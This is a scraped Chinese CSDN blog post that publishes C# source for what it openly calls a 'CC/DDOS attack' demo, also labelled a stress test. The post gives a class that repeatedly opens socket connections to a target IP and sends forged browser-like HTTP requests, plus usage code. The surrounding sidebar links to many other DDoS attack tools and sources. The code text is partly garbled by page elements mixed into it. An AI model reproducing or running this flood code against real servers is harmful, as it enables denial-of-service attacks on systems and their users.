**CSDN** 博客 学院 下载 GitChat TinyMind 论坛 APP 问答 商城 VIP 活动 招聘 ITeye



# ♥ C#压力测试 (CC/DDOS攻击) 源代码

2012年11月19日 17:44:45

```
凸
发放一个C#(C#封装的网络类比较多
                                       旬,适合做网页测试软件)的CC/DDOS攻击器demo的源代码。
  1 using System.Text;
      using System.ComponentModel;
                                   using System.Net.Sockets;
                                  收藏
      using System.Net;
  5
  6
      namespace DepthCharge
                                  微信
  7
  8
          class HttpTest
                                   63
  9
                                  微博
                                     "\r\n";
 10
              const string NewLine -
              bool run = false;
 11
              BackgroundWorker wor QQ
  12
              int count;
  13
              string host;
  14
  15
              int port;
              string path;
                                  re
              string method;
  17
  18
              string content;
  19
              public HttpTest(int count, string host, int port, string path, string method, string content)
 20
  21
                 this.count=count;
  22
                this.host = host;
                this.port = port:
 23
                this.path = path;
  24
                this.method = method;
  25
                 this.content = content;
 26
  27
 28
  29
              public void start()
  30
  31
 32
                  worker = new BackgroundWorker();
 33
                 worker.DoWork += new DoWorkEventHandler(doWork);
  34
                 worker.RunWorkerAsync();
  35
                  worker.WorkerSupportsCancellation = true:
  36
              }
  37
              public void stop()
  38
              {
  39
                  run = false:
 40
                  worker.CancelAsync();
 41
              private void doWork(object sender, DoWorkEventArgs e)
  42
  43
                  run = true;
  44
  45
                  StringBuilder strb = new StringBuilder();
                  strb.Append(method + " " + this.path + NewLine);
  46
                  strb.Append("HOST: " + this.host + NewLine);
 47
                  strb.Append("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 5
 48
                  strb.Append("Accept: */*" + NewLine);
 49
 50
                  strb.Append("Connection: keep-alive" + NewLine);
                  strb.Append("Referer: http://" + this.host + NewLine);
 51
                  strb.Append("HOST: " + this.host + NewLine);
 52
 53
                  strb.Append("Accept-Encoding: gzip,deflate" + NewLine);
  54
                  strb.Append("Accept-Language: zh-CN,zh;q=0.8" + NewLine);
  55
                  if ("POST".Equals(method))
  56
                      strb.Append("Content-Length: " + System.Text.Encoding.ASCII.GetBytes(content.ToString()).Length + NewLine);
```

```
2018/8/14
      60
```

#### C#压力测试(CC/DDOS攻击)源代码-CSDN博客

```
strb.Append(NewLine);<sub>61</sub>
                                                       if ("POST".Equals(method))
62
63
                     strb.Append(content);
64
65
                byte[] buf = System.Text.Encoding.ASCII.GetBytes(strb.ToString());
                for (int i = count; i > 0 && run; --i)
66
67
                    byte[] recvBuf = new byte[64];
68
                    IPAddress ip = IPAddress.Parse(host);
69
70
                    System.Net.IPEndPoint endp = new System.Net.IPEndPoint(ip, 80);
71
                    var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
72
                    socket.Connect(endp);
73
                    socket.Send(buf);
74
                    socket.Receive(recvBuf, 64, SocketFlags.None);
75
76
77
78
            public bool Running { get{return run;} set{run=value;} }
79
80 }
```

#### 使用方法:

1 httptest = new HttpTest(int nttpcount.Text), this.httphost.Text,int.Parse(this.httpport.Text), this.httppath.Text, this.http 2 httptest .start();

个人分类: C#.Net ▼查看关于本篇文章更多信息

上一篇 C#实现DDOS攻击代码介绍

下一篇 HTML5 缓存: cache manifest



## WordPress.com:创建免费网站或博客

想对作者说点什么?

我来说一句



不应该用webhttp方式吗,你用这种方法一点作用都无用,楼主请给我反思吧。



newpowersky 2015-11-08 19:57:06 #1楼

这个作用如何???



### CC压力测试

2015年06月13日 377KB 下载

# asp.net-防DDOS攻击(CC攻击)代码

//Web.config // // // // using System; using System.Web; using System.Collections.Ge...

### ⊚ 1923

# 被骗几十万总结出来的Ddos攻击防护经验! - CSDN博客

有15年防ddos攻击防护经验。被骗了很多回(都说能防...寻找倒推的线索,找出可能是C&C服务器的IP或相关...

### DDOS工具合集 - CSDN博客

+L对C无效TargetHttp就是指攻击的对象略,记得用...国外一款强大的DDOS工具,不压于CC。Target IP:目标...2017-01-23 17:14:42 阅读数:2887 DDoS攻击工具...



### 咦? 八周学会区块链开发,程序员转行利器!

区块链DApp开发学习路线图,月薪4万很轻松



## 免费的cc压力测试小工具

2013年11月08日 下载 403KB

# 分享下今天研究的流量上限DDos攻击分析和解决方案 - CSDN博客

通过这个数据就很容易理解DDoS攻击下,带宽是多台客户端服务器带宽的总和,当黑客...c++ 23篇 Computer 6篇 c语言 20篇 java 27篇 linux实验 8篇 Power...

#### tfn代码 ddos攻击工具

ij380382856 2016-03-23 10:39:44 一般,也不太好用 moza909 2016-02-05...ddos攻击工具 5C币 591下载 tfn下载 5C币 591下载 ddos攻击代码c语言 3C币...

### C# DDOS攻击代码 (伪IP)

◎ 7190

//在工程属性中设置"允许不安全代码"为true using System;using System.Net;using System.Net.Sockets;using System.Threadi...



### C#DDOS源代码

2013年07月16日 166KB 下载

# DDOS攻击模拟器,可完整使用

DDOS攻击模拟器,可实现syn flood等攻击。此软件只为学习研究提供,请勿破坏。把...所需: 5积分/C币 开通VIP 立即下载 评论共有22条 etk316 2016-09-23 11:...

### DDoS攻击的研究

本文首先介绍了DDoS攻击定义及原理,对

;常用工具进行了深入的分析,总结出每...上传者: benqhand 时间: 2009-12-23 综合评分: 5 积分/C币:3 浅析DDoS攻...

#### android-<em>23</em>

# 农村有一宝,可祛灰指甲,可惜很少人知道

环球融汇·顶新

### [转载]多线程DDOS攻击源代码 - CSDN博客

DDOS程序源代码 /\*\*\* DOS.c \*\*\*/ #include #include #include #include #...多线程的DDOS攻击程序源代码 2014年02月23日 2KB 下载 c#编写的ddos源码 ...

# 免费ddos攻击器+教程\_可打IP - CSDN博客

5积分/C币 开通VIP 立即下载 评论共有0条 DDOS攻击器 SYN攻击... SSL DDOS...web 23篇 九度oj 2篇 汇编语言 2篇 其他1篇 sql 2篇 windows 1...

# Golay(<em>23</em>,12)

上传者: john 时间: 2014-12-16 综合评分: 4 积分/<em>C</em>市:3 bch(<em>23</em>,12)...独家 区块链安全大牛深度解剖<em>DDoS...

## android sdk <em>23</em>

上传者: aasmfox 时间: 2014-09-02 综合评分: 4 积分/<em>C</em>市:1 android-<em>23</em> 立即下载 上传者: 史慧君 时间: 2017-0...

### 常见的DDos攻击手段 - CSDN博客

DDos攻击现在有比较多的方式,如SYN ...一个简单词法分析器的C语言实现 阅读量:10901 pytho...

# 走近科学:揭秘在线DDoS攻击平台 - CSDN博客

而黑客主要是连接C&C服务器对肉鸡集群下达命令。这种流量产生的攻击也叫做肉鸡集群DDOS攻击(Bot Net DDOS ...

### android6.0 api<em>23</em> sdk下载

android6.0 api<em>23</em> sdk,解压之后放入SDK的plantform文件夹

### Android Support Library <em>23</em>.2官网下载

<em>23</em>.2 版本添加了一些新的支持库,同时还为现有的库增加了新特性。 综合评分:0 收藏评论举报 所需: 5积分/<em>C</em>市 ...

# c#编写的ddos源码

② 2722

tcp协议是3次握手的方式连接的,第一次客户机向服务器发送一个标志为syn的数据包,这个数据包的tcp部分有个16位随即序列号,而...

### NET平台下的IP欺骗和SYN Flood攻击

△ 4250

本文讨论了微软.NET平台的IP欺骗与SYN Flood攻击问题,并用#设计实现TCP洪水攻击和IP欺骗进行实验测试,测试结果表明微软.N...

# asp.net防类似DDOS攻击(CC攻击)代码

◎ 776

Web.config using System; using System.Web; using System.Collections.Generic; using S...



# 订单管理系统

百度广告

# 被骗几十万总结出来的Ddos攻击防护经验!

● 7705

转载地址:http://www.ijiandao.com/safe/cto/15952.html 本人从事网络安全行业20年。有15年防ddos攻击防护经验。被骗了很多回(...



### DDos攻击源码(网站压力测试)

⊚ 1836

 $using\ System. Text;\ using\ System. Component Model;\ using\ System. Net. Sockets;\ using\ System. Net;\ \dots$ 



# NBDDOS压力测试完整版源码,附加完整的攻击模块

2013年06月01日 1.92MB

下载

# DDOS攻击实现及学习

DDOS攻击实现及学习目录:DDOS攻击实现及学习 目录 1背景 2实验环境 3源码 4使用方法 5实验效果 6实验总结1、背景: 学习并实...

# DDoS详解 (三.攻击工具)

② 2382

综合性工具 Hping:(http://www.hping.org/

用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore Sanfilippo。...



## 怎么攻击服务器

百度广告



### DOOS攻击源代码 开源

2008年12月25日 172KB 下载

# 最新的安卓6.0SDK android-<em>23</em>

最新的安卓6.0开发 SDK android-<em>23</em> 从谷歌官方下载的 综合评分:4 收藏评论(19)举报 所需: 1积分/<em>C</em> 开通VI...



C# winform打开文件夹并注

vs2010 sp1 创建silverlight 创建silverlight项目之前,1 的silverlight Developer运行

Server 2003下如何配置Si

Silverlight-TextBlock換行-

# 个人分类

Android

C#.Net

FLEX

ICE

.I2MF

展开

#### 归档

2016年4月

2014年12月

2014年10月

2014年6月

2014年5日

展开

### 热门文章

websocket规范 RFC6455

阅读量: 16521

WebScoket 规范 + WebSc

阅读量: 13138

Android应用程序的国际化

阅读量: 8570

memcached (windows)

阅读量: 8280

Xcode 4.1/4.2/4.3 免证书( 试+生成IPA全攻略

阅读量: 7523

# 最新评论

C#压力测试(CC/DDOSI) qq\_29924789:不应该用webt 种方法一点作用都无用,楼主ì

c# 钩子屏蔽键盘快捷键 renmengmeng520: c# 钩子屏

websocket规范 RFC64...

z\_kikyou: 感谢

利用Visual C#实现ICMP... weixin\_41272131: 这篇文章7

websocket规范 RFC64...

yetugeng: 流弊

### Javascript

格式化 Javascript JavaScript 压缩 CSS 代码格式化工具 在线工具 - 脚本之家 五笔输入法编码在线查询》



SF 天龙





# 联系我们





关于 招聘 广告服务 ©2018 CSDN版权所有 京IC 📸 百度提供搜索支持

经营性网站备案信息 网络110报警服务 中国互联网举报中心 北京互联网违法和不良信息差